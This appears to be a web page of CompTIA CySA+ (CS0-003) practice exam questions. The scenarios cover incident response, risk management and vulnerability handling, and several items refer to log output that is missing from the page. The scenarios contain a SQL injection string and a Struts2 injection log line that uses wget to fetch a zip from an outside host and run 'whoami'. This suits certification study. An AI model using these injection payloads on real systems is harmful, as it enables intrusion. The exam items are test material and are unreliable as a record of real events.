CompTIA CS0-003 Übungsprüfungen
Zuletzt aktualisiert am 07.05.2025- Prüfungscode: CS0-003
- Prüfungsname: CompTIA Cybersecurity Analyst (CySA+) Exam
- Zertifizierungsanbieter: CompTIA
- Zuletzt aktualisiert am: 07.05.2025
K company has recently experienced a security breach via a public-facing service. Analysis of the event on the server was traced back to the following piece of code:
SELECT ’ From userjdata WHERE Username = 0 and userid8 1 or 1=1;―
Which of the following controls would be best to implement?
- A . Deploy a wireless application protocol.
- B . Remove the end-of-life component.
- C . Implement proper access control.
- D . Validate user input.
An incident response team member is triaging a Linux server.
The output is shown below:
$ cat /etc/passwd
root:x:0:0::/:/bin/zsh
bin:x:1:1::/:/usr/bin/nologin
daemon:x:2:2::/:/usr/bin/nologin
mail:x:8:12::/var/spool/mail:/usr/bin/nologin
http:x:33:33::/srv/http:/bin/bash
nobody:x:65534:65534:Nobody:/:/usr/bin/nologin
git:x:972:972:git daemon user:/:/usr/bin/git-shell
$ cat /var/log/httpd
at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208)
at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316)
at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
WARN [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami)
A t org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.<init>(FileUpl oadBase.java:947)
at org.apache.commons.fileupload.FileUploadBase.getItemiterator(FileUploadBase.java:334)
at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartReq uest.java:188)
org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultipartReq uest.java:423)
Which of the following is the adversary most likely trying to do?
- A . Create a backdoor root account named zsh.
- B . Execute commands through an unsecured service account.
- C . Send a beacon to a command-and-control server.
- D . Perform a denial-of-service attack on the web server.
Which of the following risk management principles is accomplished by purchasing cyber insurance?
- A . Accept
- B . Avoid
- C . Mitigate
- D . Transfer
A security analyst is investigating a compromised Linux server.
The analyst issues the ps command and receives the following output:
Which of the following commands should the administrator run next to further analyze the compromised system?
- A . gbd /proc/1301
- B . rpm -V openssh-server
- C . /bin/Is -1 /proc/1301/exe
- D . kill -9 1301
A security analyst responds to a series of events surrounding sporadic bandwidth consumption from an endpoint device.
The security analyst then identifies the following additional details:
• Bursts of network utilization occur approximately every seven days.
• The content being transferred appears to be encrypted or obfuscated.
• A separate but persistent outbound TCP connection from the host to infrastructure in a third-party cloud is in place.
• The HDD utilization on the device grows by 10GB to 12GB over the course of every seven days.
• Single file sizes are 10GB.
Which of the following describes the most likely cause of the issue?
- A . Memory consumption
- B . Non-standard port usage
- C . Data exfiltration
- D . System update
- E . Botnet participant
Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastructure are discovered.
Which of the following is the best solution to decrease the inconsistencies?
- A . Implementing credentialed scanning
- B . Changing from a passive to an active scanning approach
- C . Implementing a central place to manage IT assets
- D . Performing agentless scanning
Which of the following is a benefit of the Diamond Model of Intrusion Analysis?
- A . It provides analytical pivoting and identifies knowledge gaps.
- B . It guarantees that the discovered vulnerability will not be exploited again in the future.
- C . It provides concise evidence that can be used in court
- D . It allows for proactive detection and analysis of attack events
A SOC team lead occasionally collects some DNS information for investigations. The team lead assigns this task to a new junior analyst.
Which of the following is the best way to relay the process information to the junior analyst?
- A . Ask another team member to demonstrate their process.
- B . Email a link to a website that shows someone demonstrating a similar process.
- C . Let the junior analyst research and develop a process.
- D . Write a step-by-step document on the team wiki outlining the process.
A SIEM alert is triggered based on execution of a suspicious one-liner on two workstations in the organization’s environment.
An analyst views the details of these events below:
Which of the following statements best describes the intent of the attacker, based on this one-liner?
- A . Attacker is escalating privileges via JavaScript.
- B . Attacker is utilizing custom malware to download an additional script.
- C . Attacker is executing PowerShell script "AccessToken.psr.
- D . Attacker is attempting to install persistence mechanisms on the target machine.
The security analyst received the monthly vulnerability report.
The following findings were included in the report
• Five of the systems only required a reboot to finalize the patch application.
• Two of the servers are running outdated operating systems and cannot be patched
The analyst determines that the only way to ensure these servers cannot be compromised is to isolate them.
Which of the following approaches will best minimize the risk of the outdated servers being compromised?
- A . Compensating controls
- B . Due diligence
- C . Maintenance windows
- D . Passive discovery